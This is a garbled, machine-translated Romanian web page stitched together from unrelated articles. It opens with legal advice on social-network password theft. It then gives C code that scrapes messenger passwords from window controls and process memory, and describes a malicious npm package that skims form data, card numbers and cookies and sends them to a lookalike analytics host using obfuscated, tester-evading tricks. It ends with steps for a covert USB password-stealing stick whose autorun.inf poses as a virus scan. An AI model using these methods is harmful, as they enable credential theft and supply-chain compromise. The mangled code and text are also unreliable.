internetul Windows. Android

Fura toate parolele. Metode de "hacking" - furtul conturilor și parolelor vkontakte

Nu toată lumea știe că furtul parolei pe rețeaua socială fie pe orice altă resursă online este o infracțiune penală. Cât de reală este o astfel de furt, ce pedeapsă poate obține infractorul și ce să facă dacă sunteți victimă, vom spune mai jos.

Cât de reală este puterea parolei Vkontakte?

Încălzirea parolei este destul de reală, o astfel de furt poate duce la consecințe negative pentru proprietarul contului. Pe Internet puteți găsi multe povestiri despre modul în care au fost hacked conturile pentru a obține informații personale sau diseminarea informațiilor care clipește reputația proprietarului.

Furturile sunt efectuate în multe moduri diferite:

  • cu ajutorul phishingului: utilizatorul este redirecționat către o pagină falsă a site-ului, unde este rugată să intre în login și parola, care va lua apoi atașate;
  • prin selectarea combinațiilor: Această metodă este valabilă dacă parola este prea simplă;
  • ca urmare a acțiunilor frauduloase de la cunoștințe sau persoane nefamiliare (când combinația a fost pur și simplu spiată pe un computer sau un smartphone, folosind lipsa proprietarului gadget).

Notă!

Indiferent de metoda de acțiune a atacatorului, pedepsită penal. Componența infracțiunii se formează conform art. 272 din Codul penal (accesul neautorizat la informațiile despre calculator).

Dacă ai fost hacked?

Dacă ați devenit victimă de hacking pe o rețea socială Vkontakte sau oricare alta, atunci primul lucru pe care trebuie să-l faceți este să contactați serviciul de asistență cu o solicitare de blocare a contului. Poate că trebuie să acordați unele dovezi că sunteți proprietarul profilului.

Dacă parola furată este setată undeva, fiți-vă retele sociale, e-mail etc, atunci este necesar să se schimbe combinațiile pe toate celelalte servicii.

Notă!

Specialiștii de securitate a calculatorului nu recomandă instalarea aceleiași parole pe diferite site-uri, deoarece, în astfel de cazuri, atacatorii care au fost adoptați printr-un singur cont pot hack cu ușurință restul.

Toți prietenii, rudele și cunoștințele ar trebui să fie avertizați că profilul dvs. a fost hacked. Malefactorii pot încerca să trimită diverse mesaje din partea dvs. care conține legături sau solicitări rău intenționate. Prietenii dvs. pot suferi dacă cred și fac clic pe link-ul afișează banii în contul specificat în mesaj sau în numărul de telefon mobil.

Dacă acțiunile infractorului ți-au determinat rău grav, este logic să se aplice agențiilor de aplicare a legii. Pentru a face acest lucru, va trebui să scrieți o declarație poliției, care ar trebui să conțină o cerere de atragere a intrușilor în justiție conform art. 272 din Codul penal. Potrivit acestui articol, accesul neautorizat va fi pedepsit penal numai dacă informațiile au fost:

  • distrus;
  • blocat;
  • modificat;
  • copiat.

Având în vedere faptul că în blocarea se înțelege, inclusiv o dificultate vizată de acces al utilizatorilor legitimi la date, furtul de parolă VC se încadrează în sancțiunile art. 272 din Codul penal.

Pentru astfel de acte, sunt furnizate următoarele tipuri de pedeapsă:

  • o amendă până la 200.000 de ruble (sau în cantitatea salariilor infractorului timp de 18 luni);
  • munca corecțională pentru până la 1 an;
  • restricționarea libertății, a muncii forțate sau a închisorii timp de până la 2 ani.

Atunci când se iau în considerare cazul, instanța va decide care este una dintre aceste propoziții. Acesta va depinde, inclusiv gradul de prejudiciu cauzat proprietarului contului și al altor persoane. Dacă au fost cauzate daune mari (în valoare de peste 1.000.000 de ruble), dimensiunea amenzii poate crește la 300.000 de ruble, iar termenul de închisoare este de până la 4 ani.

Notă!

Deteriorările mari pot fi cauzate în cazul unui avocat al unui cont al companiei comerciale. În astfel de situații, putem merge și la apărare reputația de afaceri.suferit ca urmare a atacatorilor.

Cum să vă protejați de furarea unei parole?

Există reguli bine definite și ușor de înțeles cum să se comporte pentru a proteja împotriva furtului:

  • nu utilizați prea combinații simple, în special constând în data nașterii, numele și prenumele dvs. etc. Ele sunt foarte ușor de hack. Ei bine, dacă parola constă dintr-un set de litere incoerente, numere, mai multe semne de punctuație;
  • nu mergeți pe link-uri suspecte, nu introduceți datele dvs. despre site-uri suspecte;
  • nu salvați parolele pe dispozitive nefamiliare și nu le mai păstrați niciodată în browsere;
  • Încercați să nu introduceți conturile dvs. din rețelele Wi-Fi publice;
  • dacă este posibil, utilizați stocarea parolelor cum ar fi păstrarea.

Dacă ați devenit deja o victimă a intrușilor, căutați ajutor avocaților noștri. Acestea vor ajuta în toate etapele, începând cu pregătirea și direcția declarației din poliție și se încheie cu procesul. Sunați-ne sau lăsați mesajul dvs. pe site.

Uneori am frapant neglijenii dezvoltatorilor de software. Iar datele sunt criptate, iar noii algoritmi sunt inventari, iar programele lor sunt protejate de hacking, dar nu aduce beneficiul.

Orice utilizator mai mult sau mai puțin avansat știe că stocarea parolelor pe disc este nesigură. Cea mai fiabilă stocare a parolelor este un cap. În același timp, majoritatea programelor care necesită autorizarea utilizatorilor oferă posibilitatea de a salva (amintiti) o parola in program pentru a accelera procesul de autentificare in viitor. Dezvoltatorii implementează această funcție în moduri diferite - cineva stochează o parolă în fișierele de setări, pe cineva din registru, pe cineva din depozitul Secure Windows (același registru, dar la prețuri accesibile numai sistemului de sistem). Opțiuni de stocare a greutății. Cu toate acestea, cum ar fi metodele de a fura parolele din aceste locuri. Sunt multi programe rău intenționate, caracteristică principală sau suplimentară
care este furtul parolelor salvate din hard disk victime.

Noi, pentru că cu tine, utilizatori avansați, nu? Și, prin urmare, nu salvăm niciodată parole, ci doar amintiți-vă. Declarația este adevărată că în acest caz este parola noastră de securitate? Sa verificam.

De ce avem nevoie?

  1. Spy ++ din pachetul MS Studio vizual., sau orice astfel de utilitate.
  2. Uneltele PE sau orice utilitar care vă permite să faceți o dump.
  3. HEX WORKSHOP sau orice alt editor hexazecimal.
  4. MS Visual C ++ sau orice compilator C.

Ce vom explora?

  1. Qip.. Am Bild 8040. (qip.ru)
  2. & RQ.. Am folosit versiunea 0.9.7.4. (Andrq.org)
  3. Mail.ru Agent. Versiunea 5.0, Build 2082. (Agent.mail.ru)

Hacking parole qip.

Gratuit Pager de Internet, scris și susținut de programul de programator rus. W. Qip. Milioane de fani care îl iubesc pentru confort, o grămadă de piei și multe alte caracteristici utile.
Dacă nu aveți acest client ICQ - înainte de site-ul dezvoltatorului pentru ultima versiune. Instalați, executați.

Fereastra care a deschis ne propune să introducem date de autorizare sau să începem un nou cont. Nu contează dacă vă veți înregistra cont nou, Sau veți merge cu acreditările voastre. Trecând peste.

Qip. Vă oferă posibilitatea de a salva parola. Nu vom salva parola. În timp ce pleacă Qip. Singur și spion deschis ++. Faceți clic pe Alt + F3 și deschideți dialogul de căutare a ferestrei. Luați instrumentul Finder cu mouse-ul și aruncați-l pe fereastra Manager de cont Qip.'dar.

Faceți clic pe OK și Spy ++ ne arată în lista ferestrei fereastra de care aveți nevoie - "QIP - comunicare liniștită!", Care nume de clasă este Tmanform. Pe acesta, arborele ferestrelor pentru copii care oferă o interfață pentru conectarea la server. Suntem interesați de Tgrupbox, Tcomboxim pe ea și Teddit. Acesta este doar uin și parola noastră. Ne amintim numele clasei.

Du-te înapoi la fereastră Qip. Și faceți clic pe butonul Conectare.

Dialogul de intrare este închis. Puteți comunica. Dar verificați dacă fereastra de dialog este închisă? Actualizați lista de ferestre din Spy ++ (tasta F5) și încercați să găsiți din nou fereastra de autorizare. Qip.. Faceți clic pe Alt + F3 și introduceți parametrii de căutare. Pentru a găsi fereastra, trebuie să specificăm cel puțin un parametru: Mânerul este un identificator unic de ferestre, caption - inscripția formei, clasa de clasă - clasa ferestrei. Vom căuta după clasă.

Introducem clasa ferestrei Tmanform din câmpul de clasă. Faceți clic pe OK.

Ce vedem? Fereastra nu sa închis. Este doar invizibil ... Să încercăm să citiți câmpurile cu date de autorizare. Pentru a face acest lucru, utilizați mecanismul standard pentru comunicarea ferestrelor și sistemelor în mesaje Windows.

Începem programarea.

Void principal ()
{
//
Hwnd Hmanform, hgroupbox, hedit, hombobox; //
Identificatori formează
char * puin; // Pointer la tampon pentru uin
char * ppass; // Power tampon pointer.
int Iuin; // lungime uin.
int iPass; // Lungimea parolei

// Găsiți fereastra de dialog de autorizare
Hmanform \u003d Findwindow ("Tmanform", 0);
//
Situat un grup de controale
hgroupbox \u003d Findwindowex (Hmanform, 0, "tgrupbox", 0);

// lista cu uin "ami
Hccombobox \u003d Findwindowex (hgroupbox, 0, "tcombobox", 0);
//
Avem lungimea textului din listă
Iuin \u003d SendMessage (HcComboBox, Wm_gettextlength, 0, 0) +1;
//
Selectați memoria necesară pentru tampon
Puin \u003d (char *) Localalloc (0, Iuin);
//
Obținem direct text
SendMessage (HcCombobox, Wm_gettext, Iuin, (lung) puin);

// câmp cu parola
Hedit \u003d Findwindowex (HGroupbox, 0, "Teddit", 0);
//
Mai departe toate prin analogie cu uin "ohm

Pagass \u003d (char *) Localalloc (0, iPass);

//Să dăm ce sa întâmplat
Cout<< "[!!!]Found for: "<< pUIN << "\tPassword: " << pPass;

// Memorie libera
LocalFree (puin);
LocalFree (PPASS);
}

Salvăm, compilați, rulați. Ce am facut? Dacă totul se face corect, programul va returna șirul care conține uIN și parola.

Trebuie remarcat faptul că dacă începem Qip.În care opțiunea "Salvare parolă" a fost instalată anterior, atunci această metodă de obținere a unei parole nu va funcționa, deoarece textul este în câmpul de parolă "<:HIDDEN:>"Aparent, dezvoltatorul, marginea urechii încă auzit despre securitate.

Hacking Parole & RQ

De asemenea, gratuit și nu mai puțin popular decât Qip., Client ICQ, care este numit afectiv "Rat". Rat suportă pluginuri, piei și susținute de comunitatea dezvoltatorului.

Leagăn ultima versiune stabilă de la offsite și începe studiul.

După lansare & RQ. Invită-ne să creăm un profil nou, pentru care trebuie să vă specificați UIN sau să vă înregistrați unul nou. Apoi, se propune alegerea limbii interfeței și programul începe în siguranță. Pentru ca șobolanul să se conecteze la server, trebuie să selectați starea "online". Programul solicită o parolă și se conectează. Puteți specifica programul pe care trebuie să-l conectați automat când porniți, este necesar să puneți "Conectați când ați pornit" pe cadrul "Rulați" din setări (Alt + P). Nu este obligatoriu. Pentru noi, opțiunea "Nu salvați parola" este importantă, în setările categoriei "Securitate". Expunând-o.

Mergeți la cadrul "conexiune". Ce este demn de remarcat pentru noi această categorie? Faptul că există un câmp "Parolă". Ne amintim de această circumstanță. Voi închide șobolanul.

O voi deschide din nou. Pentru a vă conecta, trebuie să specificăm parola, deoarece setați opțiunea "Nu salvați parola". Introducem o parolă, conectați-vă. Apelați din nou dialogul Setări din nou. În mod surprinzător, câmpul "Parolă" conține text. Este parola noastră? Verifica.

Folosind utilitarul Spy ++, aflați numele ferestrelor & RQ.Și să începem să scriem codul.

Void principal ()
{
// Să declarăm variabilele necesare pentru muncă
HWENFRM, HPREFM, HPANEL, HCONNECTIONFR, HEDIT; //
Identificatori formează
char * puin; // Pointer la tampon pentru uin
char * ppass; // Power tampon pointer.
int Iuin; // lungime uin.
int iPass; // Lungimea parolei

// Fereastra principală și RQ. De la ea vom primi uin
Hmainfrm \u003d gindindow ("tmainfrm", 0);
//
Lungimea textului
Iuin \u003d SendMessage (Hmainfrm, Wm_gettextlength, 0, 0) +1;
//
Selectați tampon
Puin \u003d (char *) Localalloc (0, Iuin);
//
Obținem titlul ferestrei principale - acest lucru este uin
Getwindowtext (Hmaainfrm, Puin, Iuin);

/*
Ar trebui să se țină cont de faptul că atunci când porniți și RQ, fereastra de setări
Nu se deschide cu fereastra principală. Dar despre noi
Îi împiedică să se deschidă? Mai ales că suntem cu bunăvoință
Abilitatea de a utiliza cheile fierbinți (Alt + P). Aici
Și le imităm apăsând.

*/
// Alt + P Emularea - Tasta fierbinte pentru a apela fereastra de setări
SendMessage (Hmainfrm, WM_SYSYKODODOS, "P", 0X20000000);
SendMessage (HMainfrm, WM_SYSKEYUP, "P", 0x20000000);

// Găsim fereastra de setări
hprefrm \u003d gindindow ("tprefrm", 0);
//
Panou cu categorii de setări
HPanel \u003d Findwindowex (Hprefrm, 0, "tPanel", 0);
//
Cadru cu setările de conectare
Hconnectionfr \u003d gindwindowex (hppanel, 0, "tconnectionfr", 0);
//
Câmp cu parola
Hedit \u003d Findwindowex (HconnectionFr, 0, "Teddit", 0);

// Lungimea parolei
iPass \u003d SendMessage (Hedit, Wm_gettextlength, 0, 0) +1;
//
Selectați tampon
Pagass \u003d (char *) Localalloc (0, iPass);
//
Avem o parolă
SendMessage (Hedit, Wm_gettext, iPass, (lung) PPAS);

// Afișați rezultatul
Cout<< "[!!!]Found for: "<< pUIN << "\tPassword: " << pPass;

// Memorie libera
LocalFree (puin);
LocalFree (PPASS);
}

După executarea programului, vă puteți asigura că acest exemplu funcționează. Avem parola noastră. În același timp, dacă Qip. În cazul salvării parolei pe disc ascunde parola, atunci & RQ. Nu-i pasă cum a fost introdusă parola. În fereastra Setări, parola poate fi întotdeauna detectată.

Singura nuanță este asta & RQ. Nu deschide fereastra de setări după început, deși odată ce fereastra deschisă a setărilor după închidere nu este închisă din nou, dar pur și simplu devine invizibilă. În codul sursă, am folosit cheia fierbinte pentru a vă asigura că fereastra de setări este deschisă.

Hacking Parole Mail.ru Agent

Un alt mijloc de comunicare în rețeaua furnizată de companie Mail.ru.. Funcționează pe protocolul propriu, are posibilitatea de comunicare vocală cu acces la numerele de telefon externe. El are o grămadă de oportunități și, în consecință, fanii care se bucură de ei zilnic.

In caz de Mail.ru Agent Vom folosi o altă abordare. Un pic mai complicat, dar nu mai puțin eficient. Urmăriți ferestrele pe care nu le vom face. Să încercăm să găsim o parolă în memoria procesului.

Deci, neagăm, instalăm, înregistrați dacă aveți nevoie și executați.

Agentul suportă mai multe conturi de utilizator, iar lista lor în registru. În filiala hkey_current_user \\ software \\ mail.ru \\ Agent \\ Magent_logins, aceasta creează cât mai mulți parametri reg_binari, câte conturi sunt înregistrate pe computerul local. Cheile sunt numite după cum urmează: NNN # Your_email_ADress, unde NNN este numărul de ordine al contului.

Să vedem dacă adresa de e-mail este în memorie. Pentru a face acest lucru, utilizați utilitarul de instrumente PE care vă permite să faceți o dump de proces.

Salvăm dumpul, încărcați-l în atelier hexagonal. Faceți clic pe Ctrl + F pentru a deschide dialogul de căutare. Selectați modul String text și introduceți adresa noastră de e-mail în câmpul Valoare. Faceți clic pe OK și editorul alocă textul găsit. Ați observat deja? După 4 octeți de la adresa de e-mail este o parolă! Ce este acest byte? Aceasta este o valoare lungimii parolei pe 32 de biți. Înainte ca adresa de e-mail să aibă și lungimea sa. Asta-i tot, rămâne doar pentru a automatiza procesul de căutare decât vom face.

// Funcția returnează mânerul procesului Magent.exe
Manipulați GetProcess ()
{
Manipulați HProcessNap; //
Manipulați procesele instantanee
Processentry32 PE32; // Structura care conține informații despre proces

// Facem o imagine a proceselor
HPROCESSNAP \u003d CREATETOOLHELP32SNAPSHOT (TH32CS_SNAPPROCESS, 0);
dacă (hprocessnap \u003d\u003d invalid_handle_value) retur 0;
PE32.DSIZE \u003d Sizeof (Processentry32);
//
Mergem prin imagine
Dacă (Process32First (HPROSSNAP, & PE32)) (închidere (HPPESSSNAP); retur 0;)
do.
{
//
Comparați numele fișierului cu MAGENT.EXE
Dacă (! LSTRCMP (STRUPR ("MAGENT.EXE"), STRUPR (& PE32.SZEXEFILE))))
{
//
A găsit procesul dorit, îl rambursează mânerul
Returnați openprocess (proces_all_access, false, PE32.th32processid);
}
) În timp ce (Process32next (HPROCESNAP, & PE32));
//
Închideți instantaneul proceselor
CloseHandle (HPROSCENAP);
Retur 0;
}

void principal ()
{
Hkey Hkey; // Identificatorul cheie de registru
DWORD I, T, RETCODE, CVALUES \u003d 256; //
Variabile intermediare necesare
Char regvalue; //
Tamponul de citire a cheii de registry
DWORD CCHVALUE \u003d 1024; //
Dimensiunea memoriei tampon
Manipulați hprocesul; // Procesul de mâner
char szemail; //
Tampon pentru adresele de e-mail
int ielema; // adrese de e-mail de lungime
Hmodul Hmodul; // mâner modul
Moduleinfo modinfo; // Structura conținând informații despre modul
Dword a dwedded; // Numărul de octeți din dumpul de proces
char szpass; // Tampon pentru parolă
Bool găsit; // Flag găsit / nu a găsit parola
char * ptmp; // Tampon temporar

hprocess \u003d getprocess ();
dacă (hprocess)
{
//
Obținem modul de manipulare prin procesul de mâner,
// pentru care creăm temporar un flux nou
Manipulați Helread \u003d CreateRemoteThread (HPPESS, NULL, 0,
(Lpthread_start_routine) getmodleshandle, , 0, null);
WaitForsingLeobject (hhread, infinit);
GethreadcodeThread (HTHRED, (LPDWord) & Hmodul);
CloseHandle (HTHRED);

// Obținem informații despre modulul încărcat
Getmoduleinformation (Hprocess, Hmodul și ModInfo, dimensiunea (moduleleinfo));

// tampon de depozit
Pbyte pbuffer \u003d byte nou;
//
Citim dump.
Readprocessmemory (HProcess, modinfo.lpbaseofdll, PBuffer,
modinfo.sizeofimage, & dwdreaded);
dacă (Dwdreaded\u003e 0)
{
//
Deschideți cheia de registry
Dacă (regopenkeyex (hkey_current_user, "software \\\\ mail.ru \\\\ agent
\\\\ MAGENT_LOGINS ", 0, key_query_value, & hkey) \u003d\u003d error_success)
{
Pentru (t \u003d 0, retcode \u003d error_success; t< cValues; t++)
{
//
Propunem coada de coadă a setărilor cheie de registry pentru căutarea prin e-mail "
Retcode \u003d RegenumValue (HKEY, T, Regvalue, & CCHValue, Null, Null, Null, Null);
dacă (retcode \u003d\u003d error_success)
{
//
Primul nume de parametru 4 octeți este un număr, îl depășim. Următoarea vine adresă.
Lstrcpy (szemail, (const char *) & regvalue);
iemail \u003d lstrlen (szemail);
//
Evidențiam tamponul în care vom face zonele de depozitare comparabile
PTMP \u003d (char *) Localalloc (0, IEmail);
Găsit \u003d fals;
//
Mutarea prin dump.
pentru (i \u003d 0; i {
dacă (găsit) (i \u003d dwdreaded;) //
Terminați supraîncălzirea
// Luați un alt loc de depozitare pentru comparație
Memcy (& PTMP, & PBuffer [i], IEmail);
//
Comparaţie
Dacă (! Memcmp (& PTMP, szemail, IEmail))
{
//
După 4 octeți după adresa există o parolă.
Memcy (SZPASS, & PBFFER, dimensiunea (SZPASS));
//
Parola găsită. Afișați rezultatul.
Cout<< "[!!!]Found for: " << szEmail << "\tPassword: " << szPass;
Găsit \u003d adevărat;
}
}
LocalFree (PTMP);
}
}
Reglekey (HKEY);
}
}
}
}

Completați, executați, obțineți o parolă. Totul este simplu.

Concluzie

Ce se poate încheia? Chiar dacă nu stocăm informații confidențiale pe hard disk, este vulnerabil. Puteți găsi întotdeauna o grămadă de modalități de a obține informații închise, iar multe dintre aceste moduri vor fi atât de simple și neașteptate încât toată lumea le poate detecta. Este necesar doar să gândiți non-standard și totul se va dovedi.

Toate exemplele de mai sus vizează atragerea atenției mai strânse a dezvoltatorilor de programe la problema securității informațiilor. Codul dat de autor nu pretinde unicitatea și versatilitatea, totuși, principiul obținerii informațiilor este aplicabil pentru multe produse software.

Codul de exemplu poate fi modificat, dar este puternic recomandat numai în scopuri educaționale.

Ceea ce atacatorii nu merg la ceea ce atacatorii nu merg să fure parolele la tot felul de resurse de rețea - pagini în rețele sociale, jocuri online, sisteme de plată. Statistici ale furtului de date cu caracter personal pe rețeaua de peste a cifrelor alarmante. Pentru a nu fi printre victimele care și-au pierdut conturile, să luăm în considerare principalele metode de furt de parole care sunt utilizate de hackeri - și. Având o idee despre aceste "tehnologii" rău intenționate, ele pot fi confuze destul de eficient, urmând nivelul adecvat de securitate și confidențialitate a datelor cu caracter personal.

Triumful justiției și aprinderii are loc în timpul perioadei de hrănire. Puiile lui Malyura, invidând părinții care se apropie de cuibul cu dulciuri în cioc, încep să aibă puterea de a fi treaz, chiar tril, pe care au fost învățați să cânte în primele zile ale vieții. Obținerea de alimente, numai artiștii "motivului nativ" sunt moștenitori legali, iar puii de pui rămân cu ceva în curând mor de foame.

La prima vedere, imaginea arzătoare a naturii, dar, după cum arată ca expansiunea nesfârșită a junglei digitale a Internetului: și există parole; Și există personaje - rău și hackeri și utilizatori obișnuiți.

Deci, un cititor drag pentru a vă salva autentificările și parolele prețuite, de la o subegație, desigur, că nu va trebui să vedeți. Dar pentru a vă familiariza cu căile de a răpia datele personale, nu va fi prea inutil ... Vrei lumea? Pregătește-te pentru război!

Principalele instrumente ale atacatorului în această metodă sunt curiozitatea naivității și excesivă a utilizatorului. Nu există metode software sofisticate, viruși viclean și alte tehnologii hacker.

Villanul, știind doar datele de conectare din căsuța poștală, îl introduce la forma de autentificare. Și apoi informează sistemul care a uitat parola. Monitorul evidențiază întrebarea de testare - Hackerul nu știe răspunsul pentru el, dar își cunoaște deja conținutul. Aici începe cel mai "interesant": pe baza subiectului întrebării, el trimite victima unei "scrisori complicate", în care răspunsul corect încearcă în forma voaială. Mesajul insidios poate arăta așa ceva: "Ziua bună! Noi, locul culinar al unui astfel de lucru, ....., etc. Și care este felul tău preferat? Și acesta este doar un exemplu separat. Curățarea de acest gen "plimbări peste rețea" Marele Mn Zhenya. . Am scris un articol despre ingineria socială mai multe despre ingineria socială. Așa că uitați-vă la ambele, citiți scrisori!

Cookie de gătit (cookie)

Cookies (de la engleză. Cookie - Cookies) - Un fișier cu sesiuni pe care site-ul îl salvează în browserul utilizatorului. În aceasta, într-o formă, autentificarea, parola, ID-ul și alte informații sunt stocate, la care resursele se referă periodic în timpul lucrărilor online.

Hacker, cunoscând vulnerabilitatea unui anumit site (forum, serviciu poștal, rețea socială), scrie un script special care "trage" cookie-urile din browser-ul victimei și îl trimite. Fără participarea proprietarului contului, acesta este "caz negru" nu costă, așa cum este cel care trebuie să lanseze un scenariu rău intenționat. Prin urmare, codul, înainte de expediere, se transformă într-o "momeală" specială: în imagine, o scrisoare de litere, o cerere etc. Sarcina principală este că victima se deplasează la legătura sugerată. Și dacă se întâmplă, scriptul de hacker din browser transmit Sniffer (traficul de rețea interceptorului) instalat pe o gazdă terță parte. Și apoi direcționează utilizatorul, unde a fost promis în raport - la site-ul de dating, găzduirea video, galeria foto etc. În mod natural, proprietarul contului acestor manipulări suspectează nimic - procedura trecătoare durează doar 5 secunde.

Pentru a lăsa un hacker folosind Bruthet, cu un nas, creați parole complexe, utilizați.

Furtul de parolă vă va lipsi accesul la pagina dvs. sau poate pleca fără o sumă rotundă - aici este, fericirea atacatorului.

Luați în considerare un mod interesant modul în care furtul de parolă poate fi implementat cu succes.

Găsirea parolei sau a numărului cardului de credit în multe feluri. Apoi, vom discuta cum se face acest lucru prin implementarea codului în pachetul NPM.

Codul rău intenționat, care efectuează toată munca murdară, caută o pagină de browser a ceva din următoarele:

  • orice formă de intrare;
  • un element cu o proprietate din titlul căruia se găsește "Parola", "CardNumber", "CVC", "checkout" și așa mai departe.

Dacă după evenimentul Trimiteți, informațiile de căutare sunt găsite, există ceva de utilizat pe această pagină.

  • Din fiecare formă a formei, extrageți informații: ( document.forms.forech (...));
  • colectăm "cookie-uri": document.cookie;
  • toate aceste afaceri se transformă întotdeauna într-o linie aleatorie: const Payback \u003d BTOA (JSON.Stringfy (sensibilusardata));
  • Și după, merge la gazda intermediară: https://legit-nalytics.com?q\u003d$ (Vizualizare);
  • Și dacă aveți o utilitate - trimis la serverul Hacker.

Inversează lumea

Pentru ca această fericire să fie publicată, trebuie să forțezi cumva codul pentru a ajunge la potențialele site-uri ale donatorilor. Puteți încerca să rupeți extinderea browserelor, dar nu este atât de eficientă. Scriptura de tip încrucișat este o opțiune bună, dar el (la XSS) are propriile protocoale de securitate, iar din nou nu aceste scări. NPM este mult mai potrivit.

Puteți inventa un pachet care va schimba culoarea culorii convecției consolei în browser.

Forțând să luați această actualizare "utilă" în dependențele dvs., cu ajutorul trage rectifica pentru mai multe (oricare) pachete existente din rețea și așteptați.

Într-o lună, avem 120000 de descărcări de această actualizare și execuția codului pentru mai mult de 1000 de site-uri. Desigur, acest lucru nu este un panaceu, iar probabilitatea este mare ca actualizarea pachetului efemer să nu fie acceptată cu brațele deschise, dar este în siguranță și există o șansă ca ei să nu fie cusuți rapid.

Sau poate o lingură de gudron?

Sună netedă și frumoasă, dar există câteva întrebări care pot apărea la cititorul deliberat și trebuie să fie debunk.

Script solicitări de rețea - Codul nu trimite nimic, adică nu există niciun schimb permanent de trafic. Stoarcerea materialului asamblat are loc de la ora 19:00 la 7:00, când ofițerii de securitate și alte testere nu mai sunt teste. Chiar dacă testerul dorește, de asemenea, să se distingă, codul înlocuiește adresa URL la "stânga", similar cu rețelele sociale, iar expedierea se întâmplă întotdeauna la momente diferite: acesta este efectul surprizei.

Căutați "ciudățenii" în NPM. Noroc! Costurile temporare și de resurse sunt incomparabile, bine, dacă există ceva, atunci nu există niciun indiciu în codul din preluare, xmlhttprequest sau adresa gazdă la care este trimis totul.

const i \u003d "gfudi"; const k \u003d s \u003d\u003e s.split (""). Hartă (c \u003d\u003e șir.fromcharcode (C.Charcodeat () - 1)). Alăturați-vă (""); Auto (urlwithyourprecuitiotiotata);

const i \u003d "gfudi";

const k \u003d s \u003d\u003e s. Despică ("). Harta (c \u003d\u003e șir. Fromcharcode (C. Charcodeat () - 1)). a te alatura ("");

auto [k (i)] (urlwithyourprecutiotiodata);

"Gfudi" este o preluare, dar cu scrisori suprasolicitate pe unul, și de sine este alias fereastra. Nu a folosit nimic obișnuit ca aducerea. În schimb, oriunde puteți, trebuie să aplicați evenimensource (urlvavivabydent). Chiar dacă traficul va asculta serviciul Horworker-y, nimeni nu va suspecta nimic pentru că nimic nu este trimis în browsere care suportă serviciul de serviciu.

Folosind CSP ca protecție. Din punctul de vedere al CSP, codul nostru nu face nimic interzis, cu excepția trimiterii datelor într-un fel de domeniu. Da, CSP se confruntă bine cu atacurile XSS și pot limita comunicarea browserului cu lumea exterioară, dar acțiunile scenariului nu sunt atât de mari încât să puteți analiza ceva.

const linkel \u003d document.creelemente ("link"); Linkel.rel \u003d "Prefetch"; Linkel.href \u003d urlwithyourprecustiotata; document.head.appenddchild (linkel);

const linkel \u003d document. CreateLelement ("Link");

linkel. Rel \u003d "prefetch";

linkel. Href \u003d urlwithyourprecutiousdata;

document. Cap. Apendchild (Linkel);

Pentru a nu plăti pentru hacking, trebuie să verificați CSP pentru prezența unui sistem de blocare funcțională (Connect-SRC) și a sculei Interceptor (implicit-SRC). Puteți să o faceți așa:

JavaScript.

fetch (document.href). Atunci (resp \u003d\u003e (const csp \u003d resp.headers.get); // ne uităm la modul în care funcționează CSP);

Trebuie să verificați pentru prima dată că utilizatorul și alte gardiene nu suspectează nimic.

Unde să fugi acum?

Acum ne gândim din fața utilizatorului sau a dezvoltatorului: "Totul este rău, parolele noastre sunt deja în DarkNete!". Pentru a încerca să evitați eșecul, este imposibil să utilizați NPM pe pagini cu formulare și alte componente de colectare. Nu puteți utiliza publicitate terță parte, Google Tag Manager, scripturi cu diagrame, Analytics - Nici un cod străin nu ar trebui să fie, altfel puteți obține o injecție. Acest lucru se aplică numai paginilor, unde utilizatorul introduce ceva, restul site-ului poate lucra în siguranță pe reacția-e și nu vă faceți griji.

Aveți nevoie de o pagină separată care nu are nimic inutil și colectează deja numere de carduri de credit, parole și acreditări în iFrame.

Furtul de parolă este realizat cu ajutorul phishingului (uitarea copiei infectate a site-ului). Dacă un hacker poate să ia în posesia căsuței poștale, atunci am plâns toate conturile de înregistrare și conturile bancare care au fost legate de această corespondență. Pentru 2017, au fost hackate 12 milioane de conturi.

Este destul de reușit și Keylogery - 1 milion de utilizatori au suferit, tocmai din cauza acestei malicii.

Concluzie

Un articol că este imposibil să aveți încredere în nimeni și să lăsați un site cu vulnerabilități cunoscute, fiind strict interzis, deoarece în lume un număr mare de oameni care doresc să se bucure de ceva valoros. Orice site este vulnerabil, iar lista acestor bare se schimbă în mod constant: nu uitați să vă păstrați mâna pe puls.

Traducerea în limba rusă implementată de Biblioteca programatorului.



realin inchisoare!

Să încercăm să ne dăm seama cum puteți fura parolele de pe un computer dacă aveți acces la acesta, dar pentru ca victima să nu susțină nimic.

O modalitate este de a crea o unitate flash specială cu utilități care pot trage parole din browsere și alte programe care salvează parolele pentru confortul utilizatorului.

Descărcați utilitățile de recuperare a parolei de care avem nevoie:

* Messenpass - restabilește parolele la cele mai populare programe de mesagerie instantanee: MSN Messenger, Windows Messenger (în Windows XP), Windows Live Messenger (în Windows XP și Vista), Yahoo Messenger (versiunea 5.x / 6.x), ICQ Lite 4 .x / 5.x / 2003, AOL Instant Messenger, AIM 6.x, AIM pro, Trillian, Miranda și GaIM;

* Mail Passview - Extracte parole salvate de la clienții de poștă electronică: Outlook Express, Microsoft Outlook 2000 (Numai conturile POP3 / SMTP), Microsoft Outlook 2002/2003/2007, Windows Mail, Incredimail, Eudora, Netscape Mail, Mozilla Thunderbird, Grup gratuit Și conturile de e-mail bazate pe web;

* IE PassView - afișează autentificările și parolele salvate de "măgar";

* ChromePass - afișează autentificările și parolele salvate de Google Chrom Browser;

* ParolaFOX - primește toate parolele salvate de Firefox "OM;

* PassView de stocare protejat - restabilește toate parolele stocate în stocarea protejată;

* DIALUPASS - Pulgește toate sesiunile de parole dialup / VPN;

* Recuperarea parolei de rețea - Afișează parolele pe care le utilizați pentru o minge pe rețeaua locală, precum și parole .NET Passport / Messenger;

* PSTPASSWORD - extrage parole din fișierele personale ale folderului Outlook - .pst;

* WirelessKEVIEW - Restaurează toate tastele de rețea fără fir (WEP / WPA), care sunt stocate pe computer.

Există, de asemenea, o utilitate OperaPassView, dar nu acceptă încă linia de comandă. Prin urmare, nu este inclusă în setul nostru.
Pot fi luate toate utilitățile.

De asemenea, avem nevoie de utilitate de pornire ascunsă ().

De asemenea, descărcați pentru a ascunde utilitățile noastre. O vom conduce la sfârșitul operațiunii de parolă "Tõrena". Și numai munca lui va vedea victima pe ecranul său.

Pregătim o unitate flash.

1. Creați două foldere pe Flashka:
flashka: \\ prog \\
flashka: \\ prog \\ log \\

2. În folderul Flashka: \\ PROG \\ TOUR Toate exesii - Utilități, Hstart.exe, Kk.exe

3. La rădăcina unității flash, creați Autorun.inf cu următorul conținut:


deschis \u003d prog / hstart / noconsole "lansare.bat"
Action \u003d Verificați calculatorul pentru viruși


